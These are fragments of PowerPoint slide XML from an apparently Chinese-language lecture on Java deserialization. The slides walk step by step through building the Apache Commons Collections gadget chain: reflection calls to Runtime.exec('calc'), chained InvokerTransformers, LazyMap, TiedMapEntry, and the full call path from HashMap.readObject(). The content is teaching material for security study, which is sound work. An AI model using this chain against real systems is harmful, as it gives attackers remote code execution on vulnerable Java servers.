              <a:t>像许多常见的应用如Weblogic、WebSphere、Jboss、Jenkins等都使⽤了Apache Commons Collections工具库，当该工具库出现反序列化漏洞时，这些应用也受到了影响，这也是反序列化漏洞如此严重的原因。</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174625" y="2039620"/>
            <a:ext cx="3723640" cy="4274820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297815" y="1267460"/>
            <a:ext cx="10802620" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>再次学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反射：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277495" y="1823085"/>
            <a:ext cx="11299825" cy="4491355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Runtime.getRuntime().exec("calc");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上述命令如何利用反射实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用反射的方法执行Runtime.getRuntime().exec("calc")的语句是这样的：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>//获取Runtime类对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Class&lt;?&gt; clazz = Runtime.class;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>//获取getRuntime方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Method getRuntimeMethod = clazz.getMethod("getRuntime", null);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>//获取Runtime对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Runtime runtime = (Runtime) getRuntimeMethod.invoke(clazz, null);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>//获取exec方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Method execMethod = clazz.getMethod("exec", String.class);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>//反射执行exec("calc")</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>execMethod.invoke(runtime, "calc");</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133350" y="1216660"/>
            <a:ext cx="11862435" cy="5098415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Commons Collections中的相关类来实现Runtime.getRuntime().exec("calc")代码呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Transformer[] transformers = {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            new ConstantTransformer(Runtime.class),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>};</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ChainedTransformer ct = new ChainedTransformer(transformers);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ct.transform("2");  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调启</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上述代码是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Commons Collections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类库中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ConstantTransformer 类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、InvokerTransformer 类、ChainedTransformer类、Transformer[] 数组等方式来组合实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的。</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92710" y="1207135"/>
            <a:ext cx="11708130" cy="1290320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>ConstantTransformer 类： ConstantTransformer 是 Transformer 的一个实现，它始终返回一个指定的常量值。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接什么返什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>InvokerTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类：定义: InvokerTransformer 是 Transformer 的另一种实现，它用于调用某个对象的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>构造函数: 需要三个参数：方法名，方法参数类型的数组，要传递给方法的参数的数组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226060" y="2594610"/>
            <a:ext cx="11224260" cy="3615690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Transformer[] 数组：定义: Transformer[] 是一个 Transformer 类型的数组。用途: 用于将多个变换器组合在一起，以便按顺序执行一系列转换操作。在你的代码中，这个数组包含了多个变换器，每个变换器负责一个具体的操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>ChainedTransformer：能够将多个变换器串联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>起来，使得输入经过一系列的处理后，可以最终执行出一些操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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194945" y="1226820"/>
            <a:ext cx="6224905" cy="4996815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>经过源码分析后发现，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ct.transform("2") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码执行之后开始做起调，在方法中实际做的事情就是遍历和调用各个元素的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>transform()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法。那么谁又会调用同样的方法呢？通过寻找源代码发现，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LazyMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>get()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法中正好也调用了transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法。那么代码就可以变换成如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="596900" y="2774950"/>
            <a:ext cx="4413250" cy="3037840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285990" y="1226820"/>
            <a:ext cx="4352925" cy="4914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184785" y="1278255"/>
            <a:ext cx="11522710" cy="4957445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Transformer[] transformers = {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new ConstantTransformer(Runtime.class),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        };</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        ChainedTransformer ct = new ChainedTransformer(transformers);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Map decorate = LazyMap.decorate(new HashMap(), ct);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> //通过decorate传值，生成一个LazyMap对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>decorate.get("1");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>启</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256540" y="1236980"/>
            <a:ext cx="6040120" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果想要实现序列化和反序列化目前的结果显然是不够的，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LazyMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和哪个类的什么方法会有联系呢？答案是TiedMapEntry类，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TiedMapEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的hashCode方法调用了getValue，getValue调用了get方法，所以可以用TiedMapEntry的hashCode方法调用LazyMap的get方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>源码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6595110" y="1111885"/>
            <a:ext cx="4908550" cy="52025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256540" y="1308735"/>
            <a:ext cx="11440160" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Transformer[] transformers = {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new ConstantTransformer(Runtime.class),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        };</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        ChainedTransformer ct = new ChainedTransformer(transformers);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Map decorate = LazyMap.decorate(new HashMap(), ct);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        TiedMapEntry t = new TiedMapEntry(decorate, "T");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>      t.hashCode();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调</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软件安全问题产生-内因</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916305" y="1473200"/>
            <a:ext cx="6096000" cy="133794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软件规模增大,功能越来越多,越来越复杂</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件模块复用，导致安全漏洞延续</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件扩展模块带来的安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042920" y="2984500"/>
            <a:ext cx="5834380" cy="3503295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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246380" y="1227455"/>
            <a:ext cx="11330940" cy="5007610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>整个完整的利用链</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>HashMap.readObject()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>HashMap.hash()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    TiedMapEntry.hashCode()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    TiedMapEntry.getValue()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        LazyMap.get()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>            ChainedTransformer.transform()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>                InvokerTransformer.transform()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>                    Method.invoke()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>                        Runtime.exec()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>该条利用链是继</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链之后最简单也是最实用的链子，原因就是该条链不受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
